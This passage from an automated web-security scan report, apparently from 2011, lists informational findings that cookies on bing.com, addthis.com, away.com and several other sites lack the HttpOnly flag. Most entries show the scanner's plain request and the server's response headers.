The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.476. http://wp-superslider.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bb2_screener_=1296674578+173.193.214.243; path=/
wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Location: http://wp-superslider.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.477. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a0f0083=a0f021f:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

12.478. http://www.astaro.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.org
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bblastvisit=1296570620; expires=Wed, 01-Feb-2012 14:30:20 GMT; path=/
vbseo_loggedin=deleted; expires=Mon, 01-Feb-2010 14:30:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.astaro.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.479. http://www.away.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.away.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3553445525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.away.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 15:43:11 GMT
Server: Apache/2.2.11 (Unix)
Location: http://away.com/
Content-Length: 224
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3553445525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://away.com/">here<
...[SNIP]...

12.480. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=0BC2ADE229F04634896564740A5A01D2; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb5a6f99140c64e31bba9881e28dc2c32; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:40 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.481. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/images
_SS=SID=EBE2AE360AFC4607A69EB91C0D4E6925; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c555a02fcae8c47d28a52d3ae0b9f2d11; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:46 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.482. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=988929FDD64C4D1397AB89DFC50C244C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.483. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=C9D81CD615004306ABB664AF6EC8D896; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ccc3a00db11484f72972e3284910409fd; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:27 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.484. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=65ECC52F9EF34CB981F99D7417322554; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c291799e91ad34543bf870f70a691a409; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.485. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=8DADF1D644F34854A1E8CA7C9D9B5D46; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7082098a8b034a49aac0ad240992ac06; expires=Fri, 01-Feb-2013 15:43:36 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.486. http://www.bing.com/news/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296574756; domain=.bing.com; path=/
_SS=SID=763DB5F1CCD148E2BB4E8A278E312C2C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.487. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=5764619496BA40119E677689023EF3BF; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cd72edb54d9204953b984e3b08f2bfcd9; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.488. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296574758; domain=.bing.com; path=/
_SS=SID=359930AE5B034C0B815E7BBE1E780610; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:18 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 01 Feb 2011 15:39:18 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296574758; domain=.bing.com; path=/
Set-Cookie: _SS=SID=359930AE5B034C0B815E7BBE1E780610; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:18 GMT; domain=.bing.com; path=/

12.489. http://www.bing.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296574725; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.490. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=2E1A7F5BA7644A2BAA06833125336168; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:02 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E1A7F5BA7644A2BAA06833125336168; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:02 GMT; domain=.bing.com; path=/

Ref A: CD471770148240C79982106E3196FBEA Ref B: 0C751A30A3996A3A2BBDCAC1C65B761F Ref C: Wed Feb 02 07:44:02 2011
PST

12.491. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=174B2CCBF11A4337B3CF5638612D64AA; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _SS=SID=174B2CCBF11A4337B3CF5638612D64AA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 49D088005C31488781F05864A51CD0E0 Ref B: 1FEE72B1922FFBCA72900903677E5007 Ref C: Wed Feb 02 07:44:01 2011
PST

12.492. http://www.bing.com/shopping/pet-beds/c/5533 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/pet-beds/c/5533

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=835633C5B9E34FC3BD3136F7AE025813; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=835633C5B9E34FC3BD3136F7AE025813; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 48D640698C34460DAAE41C3C67FB7747 Ref B: 44985E63E580B6F7BBB1992CC1B8CE47 Ref C: Wed Feb 02 07:44:01 2011
PST

12.493. http://www.bing.com/shopping/photo-storage-presentation/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/photo-storage-presentation/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=75FB9386DCDD4B3784025AB4615440AB; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=75FB9386DCDD4B3784025AB4615440AB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 9E4B693C63534AEC8EFC1CE11CF26677 Ref B: 6406D7D09DA422FFDA115320BAAB01E1 Ref C: Wed Feb 02 07:44:01 2011
PST

12.494. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=0D67D29194BA45D69B3158AB22258F94; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=0D67D29194BA45D69B3158AB22258F94; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 34F80D9B975C49DE99B9E8D01C5CCE3D Ref B: 16662B1C5A04E819A85AA80B47D2B989 Ref C: Wed Feb 02 07:44:01 2011
PST

12.495. http://www.bing.com/shopping/televisions/c/4724 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/televisions/c/4724

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=105E83DD783E4EBF96A309947C7C28C6; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=105E83DD783E4EBF96A309947C7C28C6; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: A044AA7210B64A8095686515EB0FACF0 Ref B: F4E0CF88203B93940C3E52E56446540E Ref C: Wed Feb 02 07:44:01 2011
PST

12.496. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=3E69B16A4036442C8750E36A24D9491D; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:00 GMT
Connection: close
Set-Cookie: _SS=SID=3E69B16A4036442C8750E36A24D9491D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

Ref A: 367A39370974491D8EC7128B234EA825 Ref B: 1F8AC254D8EDFEE1F8710C039C017CCC Ref C: Wed Feb 02 07:44:00 2011
PST

12.497. http://www.bing.com/shopping/womens-workout-clothing/r/146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/womens-workout-clothing/r/146

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=80438C118EA246A18DDC72E701D38668; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=80438C118EA246A18DDC72E701D38668; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 66F8F61938BD49A3B180BCB2435C3E8E Ref B: 7C7201EFEF67BB311F76467F0580E930 Ref C: Wed Feb 02 07:44:01 2011
PST

12.498. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-las-vegas.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=AF7DBFF440CB4C92B41FAE4F6A61250D; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:51 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:51 GMT
Connection: close
Set-Cookie: _SS=SID=AF7DBFF440CB4C92B41FAE4F6A61250D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:51 GMT; domain=.bing.com; path=/

Ref A: A3BFA36425D94370B7B6306334C1ACD8 Ref B: 515AD692CE0335B6277C1A30A8375574 Ref C: Wed Feb 02 07:43:51 2011
PST

12.499. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=27FE84C2DCDE46E1930C9C9FE31D1EA9; domain=.bing.com; path=/
